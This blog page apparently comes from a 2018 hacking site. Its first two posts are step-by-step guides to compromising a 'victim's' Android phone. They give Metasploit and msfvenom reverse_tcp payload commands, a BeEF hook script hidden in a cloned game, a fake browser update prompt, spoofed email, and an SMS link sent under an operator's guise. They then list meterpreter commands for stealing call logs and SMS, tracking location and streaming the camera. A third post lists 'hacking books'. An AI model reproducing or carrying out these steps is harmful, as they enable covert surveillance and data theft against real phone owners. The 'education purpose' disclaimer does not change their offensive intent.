Tuesday, 10 April 2018

Android Hacking part-2: Install apps without touching phone - SAMHACKERSWORLD

As I promise you in the previous article that my next post will be related to android hacking. In this article, you will learn how to install apps in your victim phone easily or without touching his/her phone.


I know it is not easy to take someone phone then install the ap and if you forget to open the app then no results.

If you have any problem, suggestion let me know by comments I help everyone.

Note: This is for education purpose only. Please don’t misuse it.

Requirements

beef


metasploit


Patience  (most of the readers don’t have patience )


Practical

We will create an android payload or virus or malicious app using Metasploit. I already posted here to generated android payload using Metasploit check it.

After creating the app, you launch Metasploit and wait for receiving the connection. Here are commands

┌─[ root@kali ]-[~]


└──╼ # service postresql start;msfconsole

It will launch Metasploit. Further commands

┌─[ root@kali ]-[~]

└──╼ # use exploit/multi/handler;set payload android/meterpreter/reverse_tcp;set lhost <local IP address>; set lport 4444

Remain this terminal as and follow further steps.

Launch beef. In Kali, you can start from the sidebar.

In parrot or any other security distribution, you can launch using this command.


┌─[ root@kali ]-[~]

└──╼ # beef-xss

Beef is browser exploitation framework. No matter either victim is using chrome, firefox you will not face any problem.

As you can see in the screenshot, it asks for the username and password. These are default username and password.

beef

beef

After the successful login, a new webpage will open where in the sidebar, there are two directories online browser and offline browser. We can hook browser using a script then we will able to run own codes to the victim browser. When you hook a browser, it will show in the online browser. If it is confusing, don’t worry you will understand everything.

Beef also launch a terminal when you start it. Here is the screenshot of terminal I have highlighted the example remember it we will use in future.

To hook own browser visit this link http://127.0.0.1:3000/demos/basic.htmlor insert script tag. When you open this beef will show something like this.

Meaning you hooked your browser (127.0.0.1 mean your browser).  Click on 127.0.0.1 and choose commands. In the commands tab expend social engineering and pick Fake update bar (chrome) because I’m using chrome you can find victim browser using details tab.

Open a new terminal and type ifconfig to find your IP address.

In my case, it is 192.168.43.7.

To hook a victim, my URL will be http://192.168.43.7:3000/demos/basic.html.

Connect your phone to the same network that you are using on your computer. Open this URL on the android phone here is what I got on the beef control panel. In the commands expend social engineering and choose Fake update bar (chrome) because I’m using chrome you can find browser using details tab.

In the URL we will place our android payload URL. You can upload payload to the very famous website like google drive or start own server.

Just run this command.

┌─[ root@kali ]-[~]

└──╼ # service apache2 start

After this copy your android virus that you generated in the first step to /var/www/ directory. So URL of the Android virus is http://<IP>/appname.apk

I think you know how to find local IP address. Paste in URL tab of beef and click on execute.

On executing your android phone will show you something like this.

If you choose Install Missing Plugins, then the app will start downloading.

Tap on open, the app asks for installation. After installing when you open it, you will be in the browser app (because our app will display nothing). 

But we will get a meterpreter session.

I already posted how to hide app icon, get meterpreter season again and again in the first post of Android hacking.

How to perform a real task


In the actual case, we can’t send the link like this. Your victim will close tab immediately. So we should create something engaging.

I found a snake script. It is the game developed using JavaScript you can download it from GitHub.

Note: This game only works with arrow keys. Maybe android user will be unable to play the game. So we will show install missing plugins to play the game.

Here are simple steps to do this.

First of clone this game from Github.

┌─[ root@kali ]-[~]

└──╼ # git clone https://github.com/Mariacristina88/Snake-game.git; cp -r ./Snake-game /var/www/html; nano  /var/www/html/Snake-game/snakegame.html

If above Linux commands confuse you then read my Linux commands for beginners post. Semicolon (;) is used to run two or more commands in the single line.

It will download and copy the game to HTML folder and open snakefile.html. Just insert this script tag.

<script src="https://192.168.43.60:3000/hook.js"></script>

Press ctrl+o to save ctrl+x to exit.

Now, send URL http://192.168.43.60/Snake-game/snakegame.htmlto your victim. You can port forward your router to perform it over the internet.

Now when our victim opens the link, he will see something like this.

And we will get hook that browser.  After that repeat above steps to install apps

Tip: you can add custom CSS to make fake update clear. So our victim will install app successfully.

Part-2 Email spoofing


As clear from its name we will spoof our email address. I mean you can send email from any address (yeah from even bill gates email address, do you have bill gates email address?). To spoof an email address, you need only SMTP settings.

Don’t confuse by above words there are tools and websites.

I use https://emkei.cz/ For sending spoofing emails.

This website has a straightforward interface. Just enter to, from, subject, message and send the message.

But Gmail service will catch it and move emails to spam.

In case if your victim is using webmail service then 99% chances are that your message will appear in the inbox.

Here is the screenshot of mail I send to my webmail using this website. 

Thus using spoofing email, you send the malicious app to your victim. Just make sure your message should be real and quick.

Problem with this method is who used webmail on the android phone, or my victim is using Gmail.

Well, this is part of social engineering. You should find your way to hack your victim phone. Don’t we will go further in advance of Android hacking but due to exams i will publish next article in futue.

How to hack android smartphone with an sms remotely using kali linux - SAMHACKERSWORLD

There's lots of ways to hack android smartphone using kali linux and metsploit but all those tricks are working only on local network but today i came up with idea to hack android smartphone using public ip with kali linux os and metsploit(msfvenom).Main Advantage of this hack is it work outside the network.so if person is not connected to same wifi we can also hack him using msfvenom.

Requires:

1. Kali Linux OS.

2. Mobile Number.

3. Mobile Number Operator(As We Would Send Him as message as we are operator).

4. Router Supporting Port Forwarding.



Metasploit


How to hack android smartphone with msfvenom on kali linux?


1.Open a terminal and build the android application using below command:


msfvenom -p android/meterpreter/reverse_tcp LHOST=158.458.11.236 LPORT=8080 R > hacking.apk

158.458.11.236 => Is Your Public Ip Address where the application will respond back.

8080 => Is The Port On Which the application will work

Get Your Public Ip by Searching Whats My ip upon google

Use that ip then

Suppose i got 158.458.11.236 from google

Now dump the android application into /var/html/www directory of kali linux using below command:

cp hacking.apk /var/html/www/

2.Now open another terminal and load metasploit console by typing below command:

msfconsole

  

3.Then load the multi-handler exploit by typing : 

use exploit/multi/handler 

4.Finally it's time to generate the payload to communicate with an android smartphone:

set payload android/meterpreter/reverse_tcp

set lhost 158.458.11.236

set lport 8080

5.At last type: exploit to start the listener   

6.Now our background is set let do the main work For port Forwarding 

1st Method

Open You Router Setting

Go to Virtual Server in router and then set this options

Service Port => 80

Internal Port => 8080

Ip Address => Your Kali Machine IP Address

Protocol => All

2nd Method

Open You Router Setting

Go to Forwarding Then to DMZ

Enter Ypur Ipaddress Of Kali Machine and enable it

   

7.Now we will be using Online SMS Service to send User The SMS (There Are Many Search for SMS Gateway Online).

we send our public ip in sms so when user click on our public ip, malicious application will automatically get downloaded into user smartphone.

As and when victim install the application attacker get the terminal access which allow attacker to do the funny stuffs like

a.To check whether device is rooted or not type below command:

check_root


b.Check victim’s mobile exact location type:

wlan_geolocate


it will show the exact location of victim mobile on Google maps

c.To download victim call logs from their mobile type:

dump_calllog


It will download and store txt file of call logs in your root directory

/root/calllog_dump.txt


d.To download sms dump type:

dump_sms


it will also download and store txt file of sms dump in your root directory

e.To send sms from hacked android mobile phone to someone else type:

send_sms -d “number of the person whom you want to send sms” -t “message you want send”

ex: send_sms -d 9599***847 -t hacked

f.To capture pic from victim’s mobile camera type:

webcam_list

g.it will provides you a list of all webcams on the victim mobile then select from the list and type:

webcam_snap 2


h.to stream live feed from victim’s mobile camera type:

webcam_stream


it will automatically open up a browser and you will see live feed from their camera

Sunday, 8 April 2018

40 Best Hacking Books for Beginners PDF - SAMHACKERSWORLD



Unethical hacking can be called an illegal movement to get unapproved data by changing a system’s components and abusing its escape clauses. In this world where the vast majority of the things take place online, so, you can also search for the Best hacking books for beginnersPDF or hacking books pdf. 


By hacking, people can access the unclassified data like email account subtle elements, and other individual data. Hacking tricks are usually utilized by hackers for illegal means but sometimes for the positive purposes. Especially when you have an office meeting then you need to have same data on each device and you can use hacking tricks for this.



Here, in this article, I will provide you the free hacking books to get the hang of hacking traps for online and Offline. These all hacking books are free to download, Here you will find out about how to hack; account passwords, Wi-Fi hack, and site hacking etc. With these books, you learn nuts and bolts of hacking and take in more about hacking tools. If you want to be a hacker then, you have to follow all those instructions described in the book. So let’s have a look!


These all hacking books are free to download, Here you find out about how to hack; account passwords, Wi-Fi hack, and site hacking etc. With these books, you learn nuts and bolts of hacking and take in more about hacking tools.


If you want to be a hacker then, you have to follow all those instructions described in the book. So let’s have a look!


Disclaimer: We don’t support the negative use of Hacking books and apps, the article is written only for knowledge purpose so you can learn and prevent yourself from hacking traps.




40 BEST HACKING BOOKS FOR BEGINNERS PDF


Best Hacking Books for Beginners PDF

The Internet is the vast source. Once you go online to search the guidebook for hacking anything, there you will find numerous Best hacking books for beginners PDF those books might have the different processes to hack the same thing but, you have to learn the best for you. Tu


Below I am going to enlist the pdf Books, you can download them as well.


HACKERS HIGH SCHOOL 13 COMPLETE HACKING E-BOOK


This book is best for the beginners and will teach them each nook and corner of this field. After learning completely, you will become the advanced hacker. There are many modern tips and tricks for you waiting here.



HACKING INTO COMPUTER SYSTEM


This is computer hacking book, after learning this book; you will easily catch what others do on their computer it’s quite hard to find what happens on the computer but, this book will completely guide you and make professional.



COMPUTER HACKING


This is another computer hacking book you will find free in the pdf form, there are quite simple techniques are mentioned in the book for hacking.


Download link: COMPUTER HACKING


HACKING SECRET REVEALED


You will find all the secrets of hacking, there are different tricks mentioned to hack Wi-Fi passwords, social accounts and much more. Your little efforts required to make to the smartest hacker.


Download link: HACKING SECRET REVEALED


REVERSE ENGINEERING (THE REAL HACKING)


This is the real hacking tool, you will get many useful and essential hacking tips in this book to learn many users have learned this and now they are availing this for good purposes.



HACK ANY WEBSITE, COMPLETE ANY WEB APP HACKING


Website Hacking is an art in itself and in this PDF, you will learn that how to hack a website with step by step guide. One of the simple books to make you an expert.



501 WEBSITE HACKING SECRETS


This is specifically for the website and among best hacking book for beginners PDF here you will find 501 secrets to hack the websites and each one is useful. This is just amazing book contains best ever simple techniques.



OWASP HACKING TUTORIAL AND WEB APP PROTECTION


This is another website hacking guiding PDF book. By following this you will be able to hack different sites. Moreover, you will learn that how to protect this with high security for downloading this.


Download Link:



INTERNET SECURITY TECHNOLOGY AND HACKING


This is Best hacking book for beginners PDF, there you will find each trick to hack the WiFi IP further it will teach you to create and change the passwords so that you can only use the desired WiFi network



Hacking Books PDF

HACKING ATTACKS AND EXAMPLE TESTS


This book is awesome, it basically contains one in all here; you will find unique and simple hacking methods. After learning you will be able to hack useful software like games accounts etc.



HACK YOUR FRIEND USING BACK TRAP


Back-trap, it’s a useful trick and this book will guide you to use this trick and by doing so you will be able to hack your friend’s social accounts and all the activities, now, you can keep eye on your friend. Yes! This is an amazing book.



FACEBOOK HACKING E-BOOK


Facebook, it is the vast social network, many communications take place in seconds. I am providing you a link of Facebook hacking book PDF then you will be able to hack the suspicious accounts and find their activities. So, this book will make you the Facebook accounts hacker.


Download Link: FACEBOOK HACKING Ebook


HACKING WEBSITE DATABASE AND OWING SYSTEM


This is another website hacking book in this book you will learn hacking tricks for the sites, its important features and further, learn how to own them all things step by step is mentioned in the book.


Download link:



14. CROSS-SITE SCRIPTING AND HACKING WEBSITE


This is among Best hacking books for beginners PDF and you will learn many basic tricks for hacking apps and webs and will also make you professional in hacking.



HACK THE SYSTEM FOR BEGINNERS


This is the best PDF book to hack the computer system and guide for the beginners. Follow all the instructions mentioned step by step and repeat them so, you will be able to hack any system and command it.



ETHICAL HACKING VALUE AND PENETRATION TESTING


This is another useful free PDF book for you. In this book, you will learn external and internal penetration testing and different hacking techniques.



DANGEROUS GOOGLE HACKING DATABASE AND ATTACKS


As its name suggests this book will make you learn how to hack the database of Google and the action method as well. You know that Google is the largest place and to hack its data is quite hard but this book will guide you the best and secure.



COMPUTER HACKING AND MALWARE ATTACKS FOR DUMMIES


This is one of the Best hacking books for beginners PDF, in this book you will learn to hack the viruses in the computer. Viruses usually interrupt us while using systems. After learning this book will have command on viruses what needed.



BLACK BELT HACKING AND COMPLETE HACKING BOOKS


This is a complete guide for the hacking purpose when you will start to read this book you will find many aspect and techniques of hacking apps, software, accounts and much more.



INTERNET ADVANCED DENIAL OF SERVICE (DDOS ATTACK)


This book will help you in learning the internet hacking. This book contains many things to learn and further will teach you the defense mechanism of the internet.



SECRET OF SUPER AND PROFESSIONAL HACKER


This book has been written by professional hackers, they wrote about their experience and all of those tips they used to hack anything, they have quoted their secrets inside the book so, and this is much useful.



SECURITY CRYPTING NETWORK AND HACKING


This pdf book will guide you how to hack internet networks and set your own security on this. This is an internet hacking complete guide for you.



Best hacking books for beginners pdf  – Hacking books PDF

ADVANCED SQL INJECTION HACKING AND GUIDE


SQL Injection is basically used for hacking the websites after learning this pdf book you will be able to hack any website you want.



WHITE HAT HACKING COMPLETE GUIDE FOR XSS ATTACKS


After learning the book you will become a computer security specialist and you will then, enhance the system’s security. This is great to learn it.



GRAY HAT HACKING AND COMPLETE GUIDE FOR HACKING


This is one of the best hacking books for beginners PDF and complete guide to making you a computer hacker and security specialist. Soon you will be professional once you start to learn it.



THE HACKERS UNDERGROUND HANDBOOK (HACK THE SYSTEM)


Another book to hack the system just learn the unique techniques and become a hacker and make your computer advanced.



ADVANCED HACKING EXPOSED TUTORIAL


The amazing and innovative book which let you learns all the advanced techniques of hacking in the recent year this book is created only for those who wants to learn the basics of hacking and many useful tips.



HACKING PASSWORDS FREE DOWNLOAD


Techniques of hacking the password value more nowadays. Passwords include for Gmail, social media accounts, websites, Wi-Fi and many other things so, this book will completely guide you how you can do this



REVERSE ENGINEERING FOR BEGINNERS


This is the best hacking books for beginners PDFand is awesome for the hardware and software programs it will guide you each knowledge related to these computer’s parts



ULTIMATE GUIDE FOR SOCIAL ENGINEERING ATTACK


This is the Best hacking books for beginners PDF and in this book, you will learn to hack the WiFi password of weak security. You can also read that how you can utilize it to make your WiFi and further set your strong password.



SQL INJECTION ATTACKS AND TUTORIAL BY ExploitDB


This book is specifically designed for the web applications after learning this book you will be able to hack those applications you want to change and also guide you introduce your desired one.



CEH CERTIFIED ETHICAL HACKER STUDY GUIDE


When you learn this book you will be able to use penetration techniques and can secure your system’s security, this book will make you the perfect hacker.



BOTNETS THE KILLER WEB APPLICATION HACKING


This is one of the best hacking books for beginners PDF you will learn to hack the different websites and utilize them for your own purpose by changing the name and main title.



HACKING INTO COMPUTER SYSTEM


This is another useful and essential book this will guide you that how you can hack the others system and utilize it for your own purposes.



HACKING INTO SOCIAL MEDIA MARKETING


By learning this book you can adjust the huge traffic of followers to your social accounts this is really interesting to get most followers among your all friends. Many users learned these tricks and are now utilizing them.



G-MAILS ADVANCED HACKING GUIDE AND TUTORIALS


This book is the complete guide for you to hack the Gmail accounts. This is quite hard to do this because Google has so tight security but the professional tip is required only and here it is.



VULNERABILITY EXPLOIT AND WEBSITE HACKING FOR DUMMIES


By reading this book you will be able to hack useful applications of the website and change them as you want also attract those followers you want only.



BLACK BOOK OF VIRUS AND HACKING


There come viruses in the System and usually destroy the setting of your computer and command it but this book will guide you many useful tips and after learning them, you will be able to command them



XSS + VULNERABILITY EXPLOITATION AND WEBSITE HACKING


This book is among the best pdf books for the beginners and by learning this book you will be a master in hacking any kind of website and can manage it for you as well.



NETWORK HACKING AND SHADOWS HACKING ATTACKS


This book is the last but not lease book in the list of Best hacking books for beginners PDF. It will guide you to hack any network may be it is so far from you but you can easily hack it in the seconds. This is a very useful book. All the steps are described in it so professionally. Anybody can become a network hacker after learning it.

Download link: NETWORK HACKING AND SHADOWS HACKING ATTACKS


Final Words:


So these are the books on ethical hacking for beginners, you can download Ethical hacking tutorial for beginners pdf from the links given above.


Enjoy, above are all the Best Hacking Books for Beginners PDF, you can download them by just clicking the download link. Please don’t forget to like and share this post with your friends on social media, and keep learning